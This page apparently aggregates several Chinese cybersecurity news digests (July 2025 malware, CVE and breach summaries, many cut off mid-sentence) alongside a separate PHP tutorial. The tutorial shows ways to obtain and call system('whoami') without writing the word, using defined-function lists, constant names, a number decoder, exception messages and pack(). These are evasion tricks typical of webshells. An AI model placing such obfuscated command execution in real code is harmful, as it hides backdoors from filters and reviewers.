1、Batavia间谍软件攻击俄罗斯组织窃取敏感数据 https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/ 自2024年7月以来，俄罗斯多个组织遭到名为Batavia的间谍软件攻击，攻击者通过伪装成合同文件的恶意链接，诱导用户下载并执行恶意脚本和可执行文件，从而窃取内部文件和敏感信息。该活动始于2024年7月，截至2025年7月仍在持续，攻击目标主要是俄罗斯的工业企业。攻击分为三个阶段：首先通过VBS脚本下载WebView.exe，随后WebView.exe收集系统信息并下载下一阶段的javav.exe，最终实现数据窃取和屏幕截 2、TAG-140利用DRAT V2攻击印度关键部门 https://thehackernews.com/2025/07/tag-140-deploys-drat-v2-rat-targeting.html 网络安全机构发现，与巴基斯坦以外地区有关联的黑客组织TAG-140正在利用一种名为DRAT V2的远程访问木马（RAT）攻击印度政府、国防和铁路部门。此次攻击活动通过克隆印度国防部新闻发布门户网站，诱骗用户下载恶意软件。该恶意软件通过伪造链接启动感染序列，秘密将恶意命令复制到用户剪贴板，并通过命令shell执行，从而下载并运行DRAT V2。DRAT V2是SideCopy RAT库的最新成员，具有执行任意Shell命令的功能，并通过Bas 3、ES域名恶意活动激增成为网络钓鱼攻击新宠 https://www.theregister.com/2025/07/05/spain_domains_phishing/ .es域名的恶意活动正在激增，其滥用频率已跃升至全球第三，仅次于.com和.ru域名。.es域名原本是为西班牙国家或针对西班牙语受众的网站保留的，但如今却被大量用于网络钓鱼攻击。自2025年1月截至5月，.es域名的滥用行为已有447个基础域名上的1373个子域名托管了恶意网页。其中，99%的恶意网页用于凭证网络钓鱼，1%用于分发远程访问木马（RAT）。这些恶意活动主要通过伪装成知名品牌（如微软）的电子邮件进行传播，内容通常以工作场所事务为主题，诱导用户输入凭据。尽管 4、ScriptCase漏洞致服务器存在被入侵风险 https://gbhackers.com/scriptcase-vulnerabilities/ 安全研究人员披露了流行的低代码PHP Web应用程序生成器ScriptCase中的两个严重漏洞（CVE-2025-47227和CVE-2025-47228），这些漏洞使数千台服务器面临远程代码执行和完全入侵的风险。这两个漏洞影响ScriptCase的生产环境模块，通常用于数据库和目录管理。其中，CVE-2025-47227允许攻击者通过特定HTTP请求绕过身份验证并重置管理员密码，而CVE-2025-47228则允许攻击者在登录后利用Shell注入执行任意命令。目前尚无官方修复方案，研究人员建 5、攻击者通过贿赂巴西银行员工盗窃1.4亿美元 https://www.bleepingcomputer.com/news/security/employee-gets-920-for-credentials-used-in-140-million-bank-heist/ 巴西六家银行共计损失了近1.4亿美元。攻击者通过贿赂C&M公司员工João Nazareno Roque，获取其账户凭证并利用其执行特定操作，成功入侵了与巴西中央银行连接的机密系统。Roque在此次事件中总共获得了约2770美元的非法收益，于7月3日在圣保罗被警方逮捕。此次攻击并非利用安全漏洞，而是通过社会工程学手段实现的。 6、SatanLock勒索软件宣布停止运营，称将公开所有窃取数据 https://www.freebuf.com/articles/database/438162.html 新成立的SatanLock勒索软件组织宣布即将关闭。但在消失前，该组织表示将在今日晚些时候公开从受害者处窃取的所有数据。这一声明发布在该团伙的官方Telegram频道和暗网数据泄露网站上。 7、伪装成AI工具的SEO投毒攻击瞄准8500多名中小企业用户 https://www.freebuf.com/news/438167.html 网络安全研究人员近日披露一起利用搜索引擎优化（SEO）投毒技术传播名为Oyster（又称Broomstick或CleanUpLoader）的已知木马加载器的恶意活动。此次披露正值黑客利用黑帽SEO技术操纵人工智能（AI）相关关键词搜索结果，传播Vidar、Lumma和Legion Loader等恶意软件之际。这些网站植入了JavaScript代码，可检测用户是否启用广告拦截器并收集浏览器信息，随后通过重定向链将受害者引导至托管ZIP压缩包的钓鱼页面。 8、DjVuLibre漏洞可导致Linux桌面系统代码执行 https://securityonline.info/cve-2025-53367-djvulibre-vulnerability-opens-path-to-linux-desktop-code-execution-poc-available/ DjVuLibre解码器漏洞（CVE-2025-53367，CVSS 8.4）可致Linux远程代码执行，攻击者通过伪装PDF的DjVu文件触发越界写入。Evince/Papers默认支持DjVu，AppArmor防护存在缺陷。已发布修复版本v3.5.29，建议立即升级并警惕可疑文档。 9、安全工具Shellter遭篡改事件引发漏洞披露争议 https://www.freebuf.com/articles/es/438212.html 网络安全团队近期发现，威胁攻击者正通过盗版Shellter Elite反病毒规避软件传播恶意程序。使用该商业软件检测漏洞的企业安全官（CISO）需立即升级至最新版本。这款由Shellter Project开发的工具主要用于红队测试，其11.0版本于4月16日发布，但Elastic安全实验室在4月底就监测到多起利用该软件打包信息窃取程序的攻击活动。 10、金砖国家元首签署“人工智能全球治理宣言” https://www.secrss.com/articles/80644 当地时间7月6日，在第十七次金砖国家领导人会晤期间，通过了《金砖国家领导人关于人工智能全球治理的宣言》（BRICS Leaders’ Declaration on Global Governance of Artificial Intelligence 以下简称《宣言》）。《宣言》提出了一系列指导方针，旨在推动人工智能技术的负责任开发、部署与应用，助力可持续发展和包容性增长。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、XwormRAT恶意软件利用隐写技术传播 https://asec.ahnlab.com/ko/88785/ 安全研究机构通过其“电子邮件蜜罐系统”发现，XwormRAT恶意软件正在使用隐写技术进行传播。该恶意软件以VBScript和JavaScript为起始代码，将恶意脚本插入正常代码中，使用户难以识别。脚本会调用包含PowerShell脚本的代码，下载并执行最终恶意软件。与过去版本相比，当前版本的脚本会从JPG图像末尾的位图像素数据中提取RGB值进行解码。安全专家提醒用户在打开未知来源的电子邮件时需格外小心，同时提供了相关MD5哈希和恶意网址作为威胁情报。 2、黑客滥用Inno Setup传播恶意软件 https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html 研究人员发现网络犯罪分子利用合法的Inno Setup安装程序框架作为恶意软件传播工具。攻击者通过Pascal脚本功能创建看似合法的安装程序，隐藏多阶段恶意软件负载，最终部署RedLine Stealer信息窃取恶意软件。该攻击利用XOR加密、WMI查询、文件名模式匹配、系统分析等技术，绕过安全工具和沙盒检测，并通过计划任务和DLL侧加载实现持久化。这种攻击策略利用了用户对合法安装程序的信任，通过网络钓鱼、恶意 3、新型网络钓鱼冒充DWP窃取信用卡数据 https://cybersecuritynews.com/new-phishing-attack-impersonates-as-dwp/ 研究人员发现2025年5月下旬起，一场复杂的网络钓鱼活动在英国出现，攻击者伪装成工作和养老金部（DWP）发送欺诈短信，警告收件人错过冬季取暖补贴申请，诱导其点击短链接进入虚假网站。该活动利用人们对政府福利的担忧，尤其针对弱势群体，高峰期在6月下半月。攻击者通过缩短URL和域名伪装技术，创建与官方DWP网站极为相似的页面，收集受害者信用卡、银行信息及身份验证数据。专家警告公众警惕此类攻击，避免点击可疑链接。 4、Redis被曝三大严重安全漏洞，PoC代码已公开 https://www.freebuf.com/articles/438102.html Redis数据库被曝存在严重安全漏洞，攻击者可利用该漏洞实现远程代码执行（RCE）。目前相关概念验证（PoC）代码已在安全社区流传。漏洞涉及HyperLogLog（HLL）数据结构实现问题，编号为CVE-2024-51741和CVE-2024-46981。 5、高危Lucee漏洞通过计划任务滥用实现认证RCE https://www.freebuf.com/news/437930.html Lucee应用服务器曝高危漏洞CVE-2025-34074（CVSS 9.4），允许认证管理员通过计划任务功能执行任意远程代码，影响所有版本。建议立即限制管理界面访问、审计任务、监控文件变更并应用补丁。 6、Tomcat与Camel高危RCE漏洞引发数千次利用尝试 https://securityonline.info/apache-under-attack-critical-rce-flaws-in-tomcat-camel-spark-thousands-of-exploit-attempts/ Apache Tomcat和Camel关键RCE漏洞（CVE-2025-24813等）遭全球攻击激增，3月超12万次利用尝试。攻击者可劫持系统执行任意代码，利用PUT请求缺陷或HTTP头部过滤漏洞。建议禁用Tomcat部分功能、严格校验Camel输入并立即更新补丁。 7、40余款恶意火狐扩展瞄准加密货币钱包窃取用户资产 https://thehackernews.com/2025/07/over-40-malicious-firefox-extensions.html 40余款恶意Firefox扩展伪装主流钱包工具窃取加密货币密钥，伪造好评提升可信度，部分篡改开源代码植入恶意功能。攻击者或来自俄语国家，Mozilla已下架多数扩展并开发检测系统。建议仅安装已验证扩展并定期检查行为。 8、微软Edge修复正被积极利用的Chromium漏洞 https://cybersecuritynews.com/microsoft-edge-chromium-vulnerability/ 微软紧急发布Edge 138.0.3351.65版本，修复正被利用的高危漏洞CVE-2025-6554和CVE-2025-49713，可能导致任意代码执行和数据泄露，用户须立即更新。 9、PHP高危漏洞预警威胁PHP应用安全 https://securityonline.info/php-flaws-cve-2025-1735-sqli-crash-cve-2025-6491-soap-dos-threaten-php-apps/ 发现两个高危PHP漏洞：CVE-2025-1735（SQL注入和系统崩溃）和CVE-2025-6491（SOAP协议DoS攻击），影响PostgreSQL组件和SOAP应用，需紧急修复。 10、黑客利用伪造Cloudflare验证界面诱导用户执行恶意软件 https://cybersecuritynews.com/hackers-use-fake-cloudflare-verification-screen/ 黑客伪造Cloudflare验证界面分发恶意软件，利用用户对安全服务的信任，通过多阶段攻击注入PowerShell代码，规避检测并保持零检出率，凸显行为分析防御的紧迫性。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员披露针对Android攻击行动IconAds https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-iconads/ 安全研究团队发现并破获了名为IconAds的攻击行动。该行动涉及352款应用，这些应用会在用户屏幕上加载与上下文无关的广告，并隐藏应用图标，使用户难以识别和移除违规应用。IconAds攻击高峰期每天处理12亿次竞价请求，其相关流量遍布全球，主要来源是巴西、墨西哥和美国。研究人员分析发现，IconAds应用程序采用分层混淆策略、命令与控制通信模式以及恶意活动别名等手段来隐藏其活动和自身。Google已从Google Play中移除 2、Wing FTP服务器漏洞致攻击者可完全接管 https://gbhackers.com/wing-ftp-server-vulnerability/ 一个严重漏洞在Wing FTP Server中被披露，该漏洞编号为CVE-2025-47812，CVSSv4评分高达10.0，表明其极高的危险性和易被利用性。该漏洞影响Wing FTP Server 7.4.3及更高版本。漏洞源于/loginok.html端点在处理用户名参数时对NULL字节的处理不当，攻击者可借此注入任意Lua代码至用户会话文件，进而实现未经身份验证的远程代码执行，完全接管服务器。由于Wing FTP在Linux上默认以root权限运行，在Windows上默认以NT A 3、ModSecurity WAF漏洞致DoS攻击风险 https://gbhackers.com/critical-bug-in-modsecurity-waf/ ModSecurity，一种广泛使用的开源Web应用程序防火墙（WAF），近期被披露存在一个漏洞，该漏洞可能导致服务器遭受拒绝服务（DoS）攻击。该漏洞编号为CVE-2025-52891，影响ModSecurity 2.9.8至2.9.10版本，CVSS v3基本评分为6.5，属于中等严重程度。攻击者可利用此漏洞反复发送特制的XML有效负载，摧毁WAF，进而使受保护的Web应用程序面临进一步攻击风险。该漏洞仅影响mod_security2，不影响libmodsecurity3库。默认 4、Grafana发布图像渲染器插件关键安全更新 https://www.bleepingcomputer.com/news/security/grafana-releases-critical-security-update-for-image-renderer-plugin/ Grafana Labs发布了针对Grafana图像渲染器插件和合成监控代理的关键安全更新，解决了四个Chromium漏洞。尽管这些问题两周前已在开源项目中修复，但Grafana收到安全研究员提交的漏洞赏金报告，证明Grafana组件中的漏洞可被利用。受影响的版本包括3.12.9之前的Grafana Image Renderer版本和0.38.3之前的Synthe 5、攻击者利用暴露JDWP部署加密货币挖矿程序 https://www.wiz.io/blog/exposed-jdwp-exploited-in-the-wild 研究团队发现攻击者利用暴露的Java调试线协议（JDWP）接口，对运行TeamCity的蜜罐服务器实施攻击。攻击者通过JDWP实现远程代码执行，部署了定制的XMRig加密货币挖矿程序，并设置了多种持久化机制。此次攻击显示了JDWP暴露的高风险性，攻击者在暴露机器后几小时内完成恶意软件部署，并通过代理隐藏钱包地址以躲避调查。研究团队提醒，JDWP默认无身份验证，暴露在互联网上极易被攻击，许多开发环境中的应用程序（如 TeamCity、Jenkins 等）在调试模式下会自动启动 6、Apache Tomcat和Camel漏洞遭全球恶意利用 https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/ 自2025年3月披露以来，Apache Tomcat和Apache Camel中的严重漏洞正被全球网络犯罪分子积极利用。安全研究人员记录了来自70多个国家的超过12.5万次攻击尝试。这些漏洞（CVE-2025-24813影响Tomcat，CVE-2025-27636和CVE-2025-29891影响Camel）可导致远程代码执行，对广泛部署的基于Java的平台构成重大风险。Tomcat漏洞利用了部分PUT功能与会话持 7、西班牙警方捣毁涉案金额超1000万欧元投资诈骗团伙 https://www.bleepingcomputer.com/news/legal/police-dismantles-investment-fraud-ring-stealing-10-million/ 2025年7月3日，西班牙警方成功破获一起大规模投资诈骗团伙，累计损失达1180万美元（约1000万欧元）。此次行动逮捕了21名嫌疑人，并没收了七辆豪华汽车及超过150万美元、130万欧元的现金和加密货币。诈骗团伙自2022年起实施诈骗，通过虚假的顾问和操纵的网站诱骗受害者进行虚假投资。他们设立空壳投资公司，通过社交媒体吸引受害者，提供对知名公司和加密货币的投资机会。诈骗手法类似于“爱 8、新型RondoDox僵尸网络攻击多款路由器 https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat 发现了一个名为RondoDox的新型僵尸网络，利用两个高危漏洞（CVE-2024-3721 和 CVE-2024-12856）攻击TBK DVR和Four-Faith路由器。该僵尸网络通过混淆配置数据、模仿合法流量和多层持久化机制逃避检测，并能够发起DDoS攻击。RondoDox的攻击范围已扩展到多种Linux架构，包括ARM、MIPS、Intel 80386等。研究人员建议用户及时修补漏洞，并通过持续监控 9、诈骗者冒充“美国政府效率部”窃取个人信息 https://fedscoop.com/doge-email-scam-personal-information/ 研究人员揭露了一个新型诈骗活动，诈骗者冒充“政府效率部”（DOGE）的代理，试图窃取个人信息。该诈骗活动利用了人们对DOGE（狗狗币）的混淆以及对政府补偿计划的关注。诈骗邮件声称收件人可以获得退税，并要求填写包含敏感信息的PDF申请表。这些邮件已发送至近1800个电子邮件地址和350多个组织，涉及高校、交通部门和政府机构。诈骗者通过WhatsApp与受害者互动，并声称代表联邦政府发放补偿。白宫已证实这些邮件并非来自政府。美国人事管理办公室和网络安全和基础设施安全局（CISA） 10、黑客声称入侵西班牙电信公司并泄露数据 https://www.bleepingcomputer.com/news/security/hacker-leaks-telef-nica-data-allegedly-stolen-in-a-new-breach 近日，一名自称“Rey”的黑客声称从西班牙电信公司Telefónica窃取了106GB数据，并已泄露部分数据作为证据。据黑客所述，此次入侵发生在5月30日，他们在被发现前已连续12小时窃取数据。黑客组织Hellcat曾于1月通过Jira服务器入侵Telefónica，此次入侵可能因Jira配置错误导致。黑客声称已窃取385,311个文件，包括内部通信、采购订单、客户记录和员工数 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、德国全面封杀DeepSeek，中欧数据冲突升级 https://www.freebuf.com/articles/437663.html 近日，德国柏林数据保护专员正式要求苹果与谷歌公司将DeepSeek从二者的应用商店中下架，理由是DeepSeek涉嫌严重违反《欧盟通用数据保护条例》（GDPR），并可能导致德国公民个人信息被非法转移至中国。 2、WordPress 表单插件高危漏洞威胁超60万网站安全 https://www.freebuf.com/articles/web/437532.html 热门WordPress表单插件Forminator被曝存在严重的任意文件删除漏洞（CVE-2025-6463，CVSS评分8.8），全球超过60万个活跃安装站点面临风险。该漏洞允许未认证攻击者删除包括wp-config.php在内的关键系统文件，可能导致网站完全被接管及远程代码执行。 3、思科修复统一通信管理器静态SSH root凭证高危漏洞 https://www.freebuf.com/articles/system/437600.html 数字通信技术巨头思科(Cisco)近日修复了其统一通信管理器(Unified Communications Manager，简称Unified CM)中存在的一个静态SSH凭证漏洞。该漏洞编号为CVE-2025-20309（CVSS评分为10分），存在于思科统一通信管理器及其会话管理版(Session Management Edition)中，允许远程攻击者使用开发阶段设置的硬编码root凭证登录系统。思科统一通信管理器(CUCM)是思科开发的企业级语音、视频、消息和移动通信呼叫处理系统。 4、基于Telegram的安卓短信窃取程序已感染10万台设备 https://www.freebuf.com/articles/endpoint/437611.html 网络安全公司Group-IB最新发现一个名为Qwizzserial的新型安卓恶意软件家族正在乌兹别克斯坦肆虐，通过利用该国对短信双重认证（2FA）的依赖，窃取了数千名移动用户的敏感财务数据。Qwizzserial代表了新一代安卓恶意软件攻击活动，其特点是利用Telegram机器人自动生成并分发恶意APK文件，使网络犯罪分子能够发起高度可扩展的本地化攻击。研究报告指出："这项研究揭露了此前未知的安卓短信窃取程序家族...根据其主活动组件的Java包名将其命名为Qwizzserial"。 5、朝鲜黑客利用Nim恶意软件攻击Web3加密平台 https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/ 朝鲜威胁行为体正在通过基于Nim语言编写的恶意软件，针对Web3和加密相关企业发起攻击。这种恶意软件通过进程注入技术和加密的WebSocket协议进行远程通信，具有独特的持久性机制，能够在系统重启或恶意软件终止时持续存在。此次攻击链由多个复杂的脚本和二进制文件组成，结合了C++与Nim编写的组件，形成了新的攻击模式。研究者指出，朝鲜威胁者在攻击中采用 6、Firefox出现多个恶意插件威胁加密货币安全 https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486 研究团队发现了一场针对Firefox浏览器的恶意活动。该活动涉及40多个恶意扩展程序，这些扩展程序伪装成知名加密货币钱包工具，目的是窃取用户钱包凭证，使用户的资产面临风险。从2025年4月开始，该活动一直处于活跃状态，且新的恶意扩展程序还在不断被上传至Firefox附加组件商店。这些恶意扩展程序通过夸大评论、模仿品牌等手段来赢得用户的信任，诱导用户安装。虽然目前还不能确定该活动的具体归因，但有迹象表明其可能与俄语威 7、PDF成为网络钓鱼攻击的热门传播媒介 https://blog.talosintelligence.com/pdfs-portable-documents-or-perfect-deliveries-for-phish/ 近日，安全研究机构发布了一项关于电子邮件品牌冒充检测引擎的更新，旨在增强对利用PDF有效载荷的网络钓鱼攻击的检测能力。研究显示，许多带有PDF附件的恶意电子邮件通过诱导受害者拨打对手控制的电话号码实施“电话导向攻击”（TOAD），即回拨网络钓鱼。这种攻击手法利用VoIP号码，难以追踪并增强了攻击的隐蔽性。研究指出，攻击者常常嵌入品牌徽标，利用知名品牌的信誉欺骗受害者，甚至在PDF中隐藏恶意链接和二维码。近期观察 8、伊朗黑客“罗伯特”威胁曝光特朗普团队邮件 https://www.govinfosecurity.com/irans-robert-hack-targets-trump-tests-us-cyber-gaps-a-28887 与伊朗有关的黑客组织“罗伯特”声称已窃取了约100GB来自特朗普核心圈子的电子邮件，涉及白宫办公厅主任苏西·威尔斯、特朗普律师林赛·哈利根、顾问罗杰·斯通以及成人电影明星斯托米·丹尼尔斯等。该组织曾于2024年美国总统大选前泄露过特朗普团队的邮件，部分邮件内容已被路透社证实。此次，黑客组织威胁要出售这些邮件，但未透露具体计划。美国司法部和联邦调查局已对此事展开调查，并警告任何涉及国家安全泄密的行为都将受到法律严 9、工信部印发《关于开展号码保护服务业务试点的通知》 https://www.secrss.com/articles/80478 工业和信息化部近日印发通知，部署开展号码保护服务业务试点工作。明确号码保护服务业务由应用平台提供方、基础平台提供方和业务使用方三者协同开展。为满足开展号码保护服务业务的码号资源需求，并与固定、移动用户号码明显区分，便于用户识别，工业和信息化部规划700号段作为号码保护服务业务的专用码号资源，管理位长11位，使用位长15位。要求各业务参与方严格遵守码号资源管理、防范治理电信网络诈骗、实名制、非应邀商业电子信息防控等各项规定，制定本企业相关落实措施，建立完善相关技术手段，加强业务和安全管理。 10、交行等5家银行因数据安全问题被罚，央行数据安全管理办法已施行 https://www.secrss.com/articles/80462 《银行科技研究社》（作者 木子剑）：近日，有5家银行因数据安全相关问题被罚，涉及1家国有银行、3家农商行、1家村镇银行。2025年5月初，中国人民银行发布《中国人民银行业务领域数据安全管理办法》，已于近日（6月30日）起施行。其旨在指导督促金融从业机构依法依规开展涉及货币信贷、宏观审慎、跨境人民币、银行间市场、金融业综合统计、支付清算、人民币发行流通、经理国库、征信和信用评级、反洗钱等中国人民银行业务领域数据处理活动。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 这篇文章主要是总结一下自己学习过的 “恶意函数” 篇章，重点是在如何获取恶意函数。 get_defined_functions (PHP 4 >= 4.0.4, PHP 5, PHP 7, PHP 8) get_defined_functions — 返回所有已定义函数的数组 我们主要是可以通过这个获取危险的函数 比如 比如 当然还有许多，如何执行命令就很简单了 代码如下 <?php $a=(get_defined_functions()); $a["internal"][516]("whoami"); ?> get_defined_constants get_defined_constants — 返回所有常量的关联数组，键是常量名，值是常量值 那获取的常量是不是可以为我们所用呢？ 可以看到是有 system 关键字的，我们就可以直接去获取它的 key，然后截取不就是 system 了吗 代码如下 <?php $a=get_defined_constants(); foreach ($a as $key => $value){    if (substr($key,0,7)=="INI_SYS"){        $x= strtolower(substr($key,4,6));        $x("whoami");   } } ?> 自定义方法 通过自定义的方法，从毫无头绪的数字获取到 system 函数，拿出广为流传的例子 <?php function fun($a){    $s = ['a','t','s', 'y', 'm', 'e', '/'];    $tmp = "";    while ($a>10) {        $tmp .= $s[$a%10];        $a = $a/10;   }    return $tmp.$s[$a]; } 现在还没有看出端倪，但是当你运行这串代码的时候 <?php function fun($a){    $s = ['a','t','s', 'y', 'm', 'e', '/'];    $tmp = "";    while ($a>10) {        $tmp .= $s[$a%10];        $a = $a/10;   }    return $tmp.$s[$a]; } echo fun(451232); 抛出异常截取字符串 这个手法也是比较特殊的 我们可以随便找一个异常类 比如 ParseError，然后再加上我们刚刚的自定义方法 ParseError 当解析 PHP 代码时发生错误时抛出，比如当 https://www.php.net/manual/zh/function.eval.php 被调用出错时。 它的一些属性和方法 /* 继承的属性 */ protected string $message = ""; private string $string = ""; protected int $code; protected string $file = ""; protected int $line; private array $trace = []; private ?Throwable $previous = null; /* 继承的方法 */ public Error::__construct(string $message = "", int $code = 0, ?Throwable $previous = null) final public Error::getMessage(): string final public Error::getPrevious(): ?Throwable final public Error::getCode(): int final public Error::getFile(): string final public Error::getLine(): int final public Error::getTrace(): array final public Error::getTraceAsString(): string public Error::__toString(): string private Error::__clone(): void 可以看到都是基础父类的 Exception::__construct — 异常构造函数 Exception::getMessage — 获取异常消息内容 Exception::getPrevious — 返回前一个 Throwable Exception::getCode — 获取异常代码 Exception::getFile — 创建异常时的程序文件名称 Exception::getLine — 获取创建的异常所在文件中的行号 Exception::getTrace — 获取异常追踪信息 Exception::getTraceAsString — 获取字符串类型的异常追踪信息 Exception::__toString — 将异常对象转换为字符串 Exception::__clone — 异常克隆 根据这些思路来了，我们如果能够获取报错内容，那不就是隐含的获取了恶意函数吗 代码如下 <?php function fun($a){    $s = ['a','t','s', 'y', 'm', 'e', '/'];    $tmp = "";    while ($a>10) {        $tmp .= $s[$a%10];        $a = $a/10;   }    return $tmp.$s[$a]; } $a = new ParseError(fun(451232)); echo $a->getMessage(); DirectoryIterator The DirectoryIterator class provides a simple interface for viewing the contents of filesystem directories. 它的一些方法 https://www.php.net/manual/zh/directoryiterator.construct.php — Constructs a new directory iterator from a path https://www.php.net/manual/zh/directoryiterator.current.php — Return the current DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.getbasename.php — Get base name of current DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.getextension.php — Gets the file extension https://www.php.net/manual/zh/directoryiterator.getfilename.php — Return file name of current DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.isdot.php — Determine if current DirectoryIterator item is '.' or '..' https://www.php.net/manual/zh/directoryiterator.key.php — Return the key for the current DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.next.php — Move forward to next DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.rewind.php — Rewind the DirectoryIterator back to the start https://www.php.net/manual/zh/directoryiterator.seek.php — Seek to a DirectoryIterator item https://www.php.net/manual/zh/directoryiterator.tostring.php — Get file name as a string https://www.php.net/manual/zh/directoryiterator.valid.php — Check whether current DirectoryIterator position is a valid file 其中大概看一下，其实 DirectoryIterator::getFilename 就有利用的可能 DirectoryIterator::getFilename — Return file name of current DirectoryIterator item 看一下官方的例子 <?php$dir = new DirectoryIterator(dirname(__FILE__));foreach ($dir as $fileinfo) {   echo $fileinfo->getFilename() . "\n";}?> 以上示例的输出类似于： . .. apple.jpg banana.jpg index.php pear.jpg 那岂不是我们如果可以控制自己的文件名或者目录，那不就构造出来了吗 代码如下 <?php // 创建FilesystemIterator实例 $iterator = new FilesystemIterator(dirname(__FILE__)); foreach ($iterator as $item) {    // 输出文件和目录的属性    echo $item->getFilename() . "\n"; } ?> 运行结果 确实是获取到了 pack 这个函数很有意思的 pack — 将数据打包成二进制字符串 可以构造出字符串 pack(https://www.php.net/manual/zh/language.types.string.php $format, https://www.php.net/manual/zh/language.types.mixed.php ...$values): https://www.php.net/manual/zh/language.types.string.php 将输入参数打包成 format 格式的二进制字符串。 这个函数的思想来自 Perl，所有格式化代码（format）的工作原理都与 Perl 相同。但是，缺少了部分格式代码，比如 Perl 的 “u”。 注意，有符号值和无符号值之间的区别只影响函数 https://www.php.net/manual/zh/function.unpack.php，在那些使用有符号和无符号格式代码的地方 pack() 函数产生相同的结果。 看了一下大概，再看下官方的例子 这是一些它的格式 示例 #1 *pack()* 范例 <?php$binarydata = pack("nvc*", 0x1234, 0x5678, 65, 66);?> 输出结果为长度为 6 字节的二进制字符串，包含以下序列 0x12, 0x34, 0x78, 0x56, 0x41, 0x42。 那我们按照构造出 system 的思路 <?php echo pack("C6", 115, 121, 115, 116, 101, 109); echo pack("H*", "73797374656d"); ?> 这两个结果都是 system "C6" 是格式字符串，其中 C 表示将后续的六个参数视为无符号字符（即 ASCII 字符），6 表示有六个字符。 传入的参数 115, 121, 115, 116, 101, 109 是 ASCII 码值。 115 对应的字符是 s 121 对应的字符是 y 115 对应的字符是 s 116 对应的字符是 t 101 对应的字符是 e 109 对应的字符是 m 构造出来的就是 system "H*" 是格式字符串，其中 H 表示将后续传递的参数视为十六进制字符串，* 表示任意长度。 73797374656d 是一个十六进制表示的字符串。将其转换为 ASCII 字符： 73 是 s 79 是 y 73 是 s 74 是 t 65 是 e 6d 是 m 构造出来的也是system

1、研究人员发现主流IDE在扩展程序验证方面存在安全漏洞 https://www.ox.security/can-you-trust-that-verified-symbol-exploiting-ide-extensions-is-easier-than-it-should-be/ 研究人员揭示了流行集成开发环境（IDE）在扩展程序验证方面存在严重安全漏洞。研究发现，Visual Studio Code、Visual Studio、IntelliJ IDEA和Cursor等平台的恶意扩展程序可以轻易绕过信任检查，尽管它们显示为“已验证”状态。研究团队创建了伪装成可信扩展的恶意程序，能够在开发者的机器上执行任意代码。通过修改服务器请求，攻击者可以让 2、FileFix新变种利用HTML应用程序绕过MOTW警报 https://mrd0x.com/filefix-part-2/ 安全研究机构发现了一种新的FileFix攻击变种，利用HTML应用程序（HTA）文件绕过Mark of the Web（MOTW）标记。当用户使用Ctrl+S或右键单击“另存为”保存HTML页面时，选择“网页，单个文件”或“网页，完整”格式会导致浏览器在文件中添加额外内容，但这些格式不会标记为MOTW。攻击者可以利用这一点，通过社会工程学手段诱导用户保存并运行包含恶意脚本的HTA文件。研究人员建议禁用mshta.exe的运行权限来阻止此类攻击。 3、Anthropic MCP漏洞致开发者面临远程攻击风险 https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596 网络安全研究人员发现人工智能公司Anthropic的模型上下文协议（MCP）检查器项目存在严重安全漏洞（CVE-2025-49596），CVSS评分为9.4。该漏洞可能导致远程代码执行（RCE），使攻击者能够完全访问主机。MCP由Anthropic于2024年11月推出，是一种开放协议，用于标准化大型语言模型（LLM）应用程序与外部数据源和工具的集成和数据共享。MCP Inspector是一个 4、澳航遭Scattered Spider入侵600万客户数据泄露 https://www.bleepingcomputer.com/news/security/qantas-discloses-cyberattack-amid-scattered-spider-aviation-breaches/ 近日，澳大利亚航空公司（澳航）披露了一起严重的网络攻击事件，威胁行为体获得了包含客户数据的第三方平台的访问权限，导致“大量”数据被盗。此次攻击始于一名威胁行为体攻击澳航呼叫中心，并获取了第三方客户服务平台的访问权限。被盗数据包括部分客户的姓名、电子邮件地址、电话号码、出生日期和常旅客会员号码，但信用卡或个人财务信息未遭泄露。此次攻击与勒索组织Scattered 5、Nessus严重漏洞允许覆盖任意本地系统文件 https://www.freebuf.com/articles/system/437519.html Tenable最新发布的安全公告披露了Nessus漏洞扫描器中存在的严重漏洞，攻击者可能通过权限提升攻击危害Windows系统。这些安全漏洞影响10.8.5之前的所有Nessus版本，包括一个关键的Windows特定漏洞(CVE-2025-36630)以及第三方组件libxml2和libxslt中的两个额外漏洞。 6、大语言模型随意猜测网址引发网络安全危机 https://www.csoonline.com/article/4015404/llms-are-guessing-website-urls-and-its-a-cybersecurity-time.html AI生成品牌网址错误率高达34%，5%指向钓鱼网站，威胁用户安全。攻击者利用AI幻觉抢注域名，GitHub投毒污染训练数据。专家建议验证域名所有权，加强数据审核，防范钓鱼攻击。 7、新型C4炸弹攻击绕过Chrome应用绑定Cookie加密机制 https://cybersecuritynews.com/chrome-c4-bomb-attack/ 研究人员发现Chrome的C4漏洞，利用Windows 